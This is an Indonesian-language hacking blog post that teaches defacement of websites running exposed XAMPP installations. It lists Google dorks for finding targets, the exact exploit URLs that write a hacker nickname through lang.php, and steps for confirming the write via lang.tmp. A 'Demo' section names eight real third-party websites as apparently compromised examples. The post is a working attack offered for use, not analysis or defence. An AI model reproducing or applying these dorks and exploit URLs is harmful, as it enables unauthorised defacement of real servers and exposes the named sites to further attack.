Deface Xampp Local Write Access

Hae, Bertemu lagi dengan testa di Oc-Tech7. Kali ini testa akan share Deface poc Xampp Local Write Access. Langsung aja gan.

1. Bahan :

• Internet
• Hp/pc

2. Dork :

  1) inurl:/xampp/lang.php

  2) inurl:/security/lang.php

  3) inurl:/xampp/splash.php

  4) inurl:xampp/index.php intitle:XAMPP

kembangin lagi gan.

3. Exploit :

• /xampp/lang.php?Hacked_By_N-Kun7  (untuk path /xammp atau dork no 1,3,4)
•  /security/lang.php?Hacked_By_N-Kun7   (untuk path /security atau dork no 2)

Note : Pada Nicknya bisa kalian ganti saja dengan nick kalian masing masing.

4. Langkah-langkah :

• Pertama, kita dorking dulu.
• Kedua, kita pilih salah satu web. Kalo vuln biasanya berwarna oren. Cek gambar dibawah :

• Ketiga, masukan exploitnya dibelakang web.

Contoh :

https://testatamvan.tq/xampp/lang.php?Hacked_By_N-Kun7

Kalo berhasil maka akan ada tulisan seperti ini :

• Keempat, kita tambahkan exploit dibawah ini dibelakang web tadi.

1. /xampp/lang.tmp
2. /security/lang.tmp

Note : Untuk exploit bisa disesuaikan dengan path.

Contoh:

https://testatamvan.tq/xampp/lang.tmp

Maka akan muncul nick kamu :*

5. Demo :

1. http://122.53.86.121/xampp/lang.tmp
2. http://www.colorin.com.ar/security/index.php
3. https://help.precisionit.net/xampp/lang.tmp
4. http://bls.dyndns-office.com/security/lang.tmp
5. http://www.tb-steiner.at/security/lang.tmp
6. http://imalys.com/security/lang.tmp
7. http://revolution-x.net//security/lang.tmp
8. https://umpwr.ac.id/security/lang.tmp

Note : Masukin dulu exploitnya.

6. Tutorial video :

Sekian dulu ea :V

Kalo ada yang kurang ngerti bisa Comment saja :*

Author : Oc-Tech7